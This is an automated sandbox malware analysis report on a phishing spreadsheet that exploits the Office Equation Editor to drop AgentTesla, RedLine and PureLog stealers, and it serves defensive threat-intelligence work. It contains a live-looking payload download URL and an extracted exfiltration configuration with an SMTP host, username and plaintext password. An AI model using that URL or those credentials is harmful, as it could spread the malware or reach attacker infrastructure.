
Windows Analysis Report
PO 2_5_24.xlam.xlsx

Overview

General Information

Sample name: PO 2_5_24.xlam.xlsx
Analysis ID: 1435421
MD5: 989feda4871b86bfbcec9debb0b2ec45
SHA1: 05ef3f9b7d77b9709423222a81d670cbcae013cd
SHA256: 26fcc106f92623f06b5eb2e87b2e2e58a2ad9eea51de7d15a15b85dafe44b937
Tags: AgentTesla, xlam, xlsx

Detection

AgentTesla, PureLog Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1740 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 2064 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • CKK.exe (PID: 2544 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: 6DBF70053A37B13C106C623E0934DDFF)
        • RegSvcs.exe (PID: 1128 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Malware configuration (AgentTesla): {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": "     XY%R[udi4U]=    "}
Source / Rule / Description / Author / Strings
sheet1.xml | INDICATOR_XML_LegacyDrawing_AutoLoad_Document | detects AutoLoad documents using LegacyDrawing | ditekSHen
  • 0x24c3:$s1: <legacyDrawing r:id="
  • 0x24eb:$s2: <oleObject progId="
  • 0x2540:$s3: autoLoad="true"
Source / Rule / Description / Author / Strings
00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x3f5d7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3f649:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3f6d3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3f765:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3f7cf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3f841:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3f8d7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3f967:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(16 entries in total)

Source / Rule / Description / Author / Strings
4.2.RegSvcs.exe.450ee8.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.RegSvcs.exe.450ee8.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
4.2.RegSvcs.exe.450ee8.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
4.2.RegSvcs.exe.450ee8.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x3d7d7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3d849:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3d8d3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3d965:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3d9cf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3da41:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3dad7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3db67:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.RegSvcs.exe.450000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(57 entries in total)

                  Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2064, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2064, TargetFilename: C:\Users\user\AppData\Roaming\CKK.exe

                  System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2064, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2064, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 2544, ProcessName: CKK.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2064, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 2544, ProcessName: CKK.exe
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: api.ipify.org
                  No Snort rule has matched


                  AV Detection

Source: PO 2_5_24.xlam.xlsx | Avira: detected
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.kino2.top", "Username": "serverizu09@kino2.top", "Password": " XY%R[udi4U]= "}
Source: http://23.94.54.101/ISW.exe | Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Roaming\CKK.exe | ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\CKK.exe | Virustotal: Detection: 40%
Source: PO 2_5_24.xlam.xlsx | Virustotal: Detection: 53%
Source: PO 2_5_24.xlam.xlsx | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\CKK.exe | Joe Sandbox ML: detected

                  Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 23.94.54.101 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\CKK.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: Binary string: _.pdb | source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: CKK.exe, 00000003.00000003.446352254.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, CKK.exe, 00000003.00000003.446225699.0000000002D70000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_00EADBBE
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E7C2A2 FindFirstFileExW,3_2_00E7C2A2
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB68EE FindFirstFileW,FindClose,3_2_00EB68EE
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_00EB698F
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00EAD076
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00EAD3A9
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00EB9642
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00EB979D
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00EB9B2B
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB5C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00EB5C97

                  Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590378 CreateFileW,2_2_03590378
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590477 WriteFile,2_2_03590477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0359040F WriteFile,2_2_0359040F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590502 WriteFile,CreateProcessW,ExitProcess,2_2_03590502
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035903AF LoadLibraryW,2_2_035903AF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035905A1 CreateProcessW,ExitProcess,2_2_035905A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590259 CreateFileW,2_2_03590259
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0359045B WriteFile,2_2_0359045B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900DA CreateFileW,2_2_035900DA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035905DD ExitProcess,2_2_035905DD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900DD CreateFileW,2_2_035900DD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035902D0 ExitProcess,CreateFileW,2_2_035902D0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900D4 CreateFileW,2_2_035900D4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900D6 CreateFileW,2_2_035900D6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035904C4 WriteFile,CreateProcessW,ExitProcess,2_2_035904C4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0359007B CreateFileW,2_2_0359007B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900FA CreateFileW,2_2_035900FA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0359007F CreateFileW,2_2_0359007F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590071 CreateFileW,2_2_03590071
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590075 CreateFileW,2_2_03590075
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035902E9 CreateFileW,2_2_035902E9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035904E8 WriteFile,CreateProcessW,ExitProcess,2_2_035904E8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900EB CreateFileW,2_2_035900EB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590563 CreateProcessW,ExitProcess,2_2_03590563
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590365 CreateFileW,2_2_03590365
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590098 CreateFileW,2_2_03590098
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0359009F CreateFileW,2_2_0359009F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590113 CreateFileW,2_2_03590113
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590092 CreateFileW,2_2_03590092
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590094 CreateFileW,2_2_03590094
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590089 CreateFileW,2_2_03590089
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0359008E CreateFileW,2_2_0359008E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590101 CreateFileW,2_2_03590101
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590580 CreateProcessW,ExitProcess,2_2_03590580
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590305 CreateFileW,2_2_03590305
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590107 CreateFileW,2_2_03590107
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900B2 CreateFileW,2_2_035900B2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900B4 CreateFileW,2_2_035900B4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900B6 CreateFileW,2_2_035900B6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590136 CreateFileW,2_2_03590136
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035904A8 WriteFile,2_2_035904A8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900AB CreateFileW,2_2_035900AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0359032C CreateFileW,2_2_0359032C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900AE CreateFileW,2_2_035900AE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035900A1 CreateFileW,2_2_035900A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03590123 CreateFileW,2_2_03590123
Source: global traffic | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 104.26.12.205:443
Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic | TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
